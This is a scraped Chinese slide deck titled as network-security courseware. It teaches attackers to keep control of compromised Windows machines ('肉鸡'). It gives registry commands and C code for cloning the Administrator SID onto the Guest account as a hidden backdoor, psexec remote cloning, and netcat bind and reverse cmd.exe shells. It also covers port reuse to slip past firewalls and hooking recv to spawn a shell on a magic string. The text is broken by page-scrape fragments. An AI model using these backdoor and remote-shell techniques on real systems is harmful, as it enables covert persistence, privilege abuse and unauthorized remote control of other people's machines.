网络安全学习课件

1、克隆用户克隆意义克隆原理克隆方法常用工具编程实现 牛牛文库文档分享克隆意义实现用户权限 的隐藏给自己留一个好的后门保住肉鸡 牛牛文库文档分享克隆原理参考：克隆管理员帐号的方法 /articles/200309/608.html 牛牛文库文档分享Windows 2000和Windows NT里，默认管理员帐号的SID是固定的500（0 x1f4），那么我们可以用机器里已经存在的一个帐号将SID为500的帐号进行克隆 牛牛文库文档分享Administrator sid 0 x1f4Guest sid 0 x1f5 牛牛文库文档分享SAM 键的权限默认情况下SAM键的权限修改SAM键的方法 牛牛文库

2、文档分享HKEY_LOCAL_MACHINESAMAdministrators 完全控制System 完全控制HKEY_LOCAL_MACHINESAMSAMAdministrators 没有权限System 完全控制 牛牛文库文档分享修改SAM键的方法使用regedt32修改权限 （windows 2000）以system的权限运行regedit 牛牛文库文档分享Regedt32 系统自带以system权限运行应用程序 a 利用at来启动 b 使用工具psu.exe c 其他方法 牛牛文库文档分享具体操作regedit /e 1f4.reg HKEY_LOCAL_MACHINESAMSAMD

3、omainsAccountUsers000001F4 regedit /e 1f5.reg HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers000001F5将1f4.reg的000001f4改为000001f5，并把1f5.reg的v部分替换1f4.reg的v部分，导入修改后的1f4.reg 牛牛文库文档分享编程实现权限问题的解决注册表操作 牛牛文库文档分享解决权限/ 获取SAM主键的DACL GetNamedSecurityInfo(SamName, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION, NULL, NU

4、LL, &pOldDacl, NULL,&pSD);/* 创建一个ACE，允许Everyone完全控制对象，并允许子对象继承此权限 */ BuildExplicitAccessWithName(&ea, _T(Everyone), KEY_ALL_ACCESS, SET_ACCESS, SUB_CONTAINERS_AND_OBJECTS_INHERIT); 牛牛文库文档分享/ 将新的ACE加入DACL SetEntriesInAcl(1, &ea, pOldDacl,&pNewDacl); / 更新SAM主键的DACL SetNamedSecurityInfo(SamName, SE_REG

5、ISTRY_KEY, DACL_SECURITY_INFORMATION, NULL, NULL, pNewDacl, NULL); 牛牛文库文档分享注册表操作RegOpenKeyExRegQueryValueExRegSetValueEx 牛牛文库文档分享Clone.exe 配合psexec远程克隆Psexec xx.xx.xx.xx -u administrator -p “” c clone.exe 牛牛文库文档分享Nc的使用Nc 简介Nc的使用实战 牛牛文库文档分享Nc 简介 /_/ / 0 0 =v= 瑞士军刀（Swiss Army knife） W / | | _ /_ / / /

6、 | (-)- / ( _ _.=|_E / 牛牛文库文档分享Nc的使用端口的刺探：nc -vv ip port 牛牛文库文档分享Nc的使用监听本地端口nc -vv -l -p port 牛牛文库文档分享Nc的使用正向连接nc -vv ip port 牛牛文库文档分享Nc的使用端口扫描nc -vv -w 5 ip port-port portnc -vv -z ip port-port port 牛牛文库文档分享Nc的使用文件传输 LOCAL： nc -v -n ip port y:svr.exe 牛牛文库文档分享Nc的高级用法绑定cmd.exe 到指定端口nc -l -p port -e c

7、md.exe 牛牛文库文档分享Nc的高级用法Nc反向连接获得cmdshellnc -t -e cmd.exe ip port 牛牛文库文档分享Nc的高级用法简单判断远程主机是否开放防火墙nc -vv -l -p port 牛牛文库文档分享Nc的高级用法Nc配合管道使用nc -vv ip port data.txtnc -vv ip 80 data.txt 牛牛文库文档分享Nc的高级用法端口复用nc -vv -l -p 80 -e cmd.exe 牛牛文库文档分享Nc的高级用法端口数据抓包nc -vv -w 2 -o test.txt 80 21-15 牛牛文库文档分享实战动网论坛前台提权漏洞

8、牛牛文库文档分享端口复用意义和优势常见的socket程序的安全隐患实现方法编程实现 牛牛文库文档分享意义和优势突破防火墙的端口访问限制可以在低权限用户上绑定高权限的服务应用的端口，进行该处理信息的嗅探 对一些的特殊应用，可以发起中间人攻击 牛牛文库文档分享安全隐患socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);saddr.sin_family = AF_INET;saddr.sin_addr.s_addr =htonl(INADDR_ANY); bind(s,(SOCKADDR*)&saddr,sizeof(saddr); 牛牛文库文档分享解决办法int set

9、sockopt( SOCKET s, int level, int optname, const char* optval, int optlen ); setsockopt(s,SOL_SOCKET,SO_EXCLUSIVEADDRUSE ,(char*)&val,sizeof(val); 牛牛文库文档分享实现方法getpeername查找socket字串匹配查找socketHook系统的recv调用 牛牛文库文档分享getpeername查找socket客户端在发送攻击串之前用getsockname函数获得套接字本地信息服务端从1开始递增查找socket，并且用getpeername函数获

10、得套接字远程信息。 如果两个信息相符就认为找到socket，跳出递增循环 牛牛文库文档分享int getsockname( SOCKET s, struct sockaddr* name, int* namelen ); int getpeername( SOCKET s, struct sockaddr* name, int* namelen ); 牛牛文库文档分享Getpeername方法的局限性有很大局限性，如果客户端在NAT网络环境里，客户端getsockname取得的套接字信息和服务端getpeername取得的套接字信息不一定相符，导致查找socket失败。 牛牛文库文档分享字串匹

11、配查找socket客户端在发送完攻击数据包后，再发送几个字节的字符串，在服务端的对一个递增的socket值接收相应字节的字符串，然后匹配是否是当前连接的socket。这种方法避免了getpeername在NAT网络环境里的限制。多线程环境下容易处理到处于accept下的socket，一般的网络函数都会进入等待状态，直到有连接建立。flier提到WaitForSingleObjectEx处理这种处于accept的socket会返回WAIT_TIMEOUT，可用的句柄返回WAIT_OBJECT_0 牛牛文库文档分享查找流程 while (1) i+; ret = WaitForSingleObje

12、ctEx(i, 10, 1); if (ret != 0) continue; ret = ioctlsocket(i, FIONREAD, &ul); if (ul != 4) continue; recv(i, buff, 4, 0); if( *(DWORD *)buff = Xc0n) 牛牛文库文档分享Hook系统的recv调用用VirtualProtect设置真实recv函数地址开始的5个字节可写。把真实recv开始的指令改为跳转到新recv函数。在新的recv函数里先把这5个字节指令改回去。调用真实recv来执行系统本来的操作。把真实recv函数地址开始的5个字节改为跳转新recv的指令。 比较接收的数据是否是约定字串，如果是就绑定一个cmd.exe，否则跳到压栈的返回地址，继续系统原来的流 程 牛牛文库文档分享编程实现端口复用将服务重新绑定在地址，而且不能使用SO_EXCLUSIVEADDR